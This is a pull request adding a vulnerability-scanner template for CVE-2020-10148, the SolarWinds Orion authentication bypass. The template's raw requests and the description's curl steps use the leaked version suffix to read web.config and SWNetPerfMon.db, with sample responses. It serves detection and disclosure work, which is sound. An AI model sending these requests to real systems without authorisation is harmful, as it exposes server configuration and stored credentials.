### PR TITLE
Add CVE-2020-10148

### DIFF
--- a/cves/CVE-2020-10148.yaml
+++ b/cves/CVE-2020-10148.yaml
@@ -6,11 +6,9 @@ info:
   description: >
     The SolarWinds Orion API is vulnerable to an authentication bypass that
     could allow a remote attacker to execute API commands. 
-
     This vulnerability could allow a remote attacker to bypass authentication
     and execute API commands which may result in a compromise of the SolarWinds
     instance.
-
     SolarWinds Orion Platform versions 2019.4 HF 5, 2020.2 with no hotfix installed, and 2020.2 HF 1 are affected
 requests:
   - raw:

--- a/cves/CVE-2020-10148.yaml
+++ b/cves/CVE-2020-10148.yaml
@@ -5,7 +5,7 @@ info:
   severity: high
   description: >
     The SolarWinds Orion API is vulnerable to an authentication bypass that
-    could allow a remote attacker to execute API commands. 
+    could allow a remote attacker to execute API commands.
     This vulnerability could allow a remote attacker to bypass authentication
     and execute API commands which may result in a compromise of the SolarWinds
     instance.

--- a/cves/CVE-2020-10148.yaml
+++ b/cves/CVE-2020-10148.yaml
@@ -1,0 +1,53 @@
+id: cve-2020-10148
+info:
+  name: Local File Disclosure for SolarWinds Orion
+  author: harryha
+  severity: high
+  description: >
+    The SolarWinds Orion API is vulnerable to an authentication bypass that
+    could allow a remote attacker to execute API commands. 
+
+    This vulnerability could allow a remote attacker to bypass authentication
+    and execute API commands which may result in a compromise of the SolarWinds
+    instance.
+
+    SolarWinds Orion Platform versions 2019.4 HF 5, 2020.2 with no hotfix installed, and 2020.2 HF 1 are affected
+requests:
+  - raw:
+      - >
+        GET /Orion/invalid.aspx.js HTTP/1.1
+        Host: {{Hostname}}
+        User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101
+        Firefox/68.0
+        Accept: */*
+        Connection: close
+      - >
+        GET /web.config§version§ HTTP/1.1
+        Host: {{Hostname}}
+        User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101
+        Firefox/68.0
+        Accept: */*
+        Connection: close
+      - >
+        GET /SWNetPerfMon.db§version§ HTTP/1.1
+        Host: {{Hostname}}
+        User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101
+        Firefox/68.0
+        Accept: */*
+        Connection: close
+    extractors:
+      - type: regex
+        name: version
+        part: header
+        internal: true
+        group: 1
+        regex:
+          - /Orion/invalid.aspx.js(.*)
+    matchers:
+      - type: word
+        words:
+          - orionProxy
+          - sw.web.compression
+          - SolarWinds.Orion.Core.
+        condition: or
+        part: body

--- a/workflows/solarwinds-orion-workflow.yaml
+++ b/workflows/solarwinds-orion-workflow.yaml
@@ -13,3 +13,5 @@ workflows:
     subtemplates:
       - template: cves/CVE-2018-19386.yaml
       - template: default-credentials/solarwinds-default-admin.yaml
+      - template: cves/CVE-2020-10148.yaml
+

--- a/workflows/solarwinds-orion-workflow.yaml
+++ b/workflows/solarwinds-orion-workflow.yaml
@@ -14,4 +14,3 @@ workflows:
       - template: cves/CVE-2018-19386.yaml
       - template: default-credentials/solarwinds-default-admin.yaml
       - template: cves/CVE-2020-10148.yaml
-


### PR DESCRIPTION
Because the #715 has not added the suffix `version` which located on Location header in the response, such as `.js.i18n.ashx?l=en-US&v=42341.25` to bypass authentication.  So template #715 may not be able to detect the vulnerability yet. The exploitation method is described in the steps below

Step 1
```
curl -I https://test/Orion/invalid.aspx.js -k                                                                                                                                         60 ↵
HTTP/1.1 404 Not Found
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 0
Expires: -1
Location: /Orion/invalid.aspx.js.i18n.ashx?l=en-US&v=42341.25
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Wed, 30 Dec 2020 10:33:26 GMT
```
Step 2
```
curl -I "https://test/web.config.i18n.ashx?l=en-US&v=42519.41.L" -k                                                                                                                
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 36320
Content-Type: text/plain; charset="UTF-8"
Expires: Thu, 30 Dec 2021 10:41:31 GMT
Server: Microsoft-IIS/8.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
X-Same-Domain: 1
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Date: Wed, 30 Dec 2020 10:41:31 GMT
```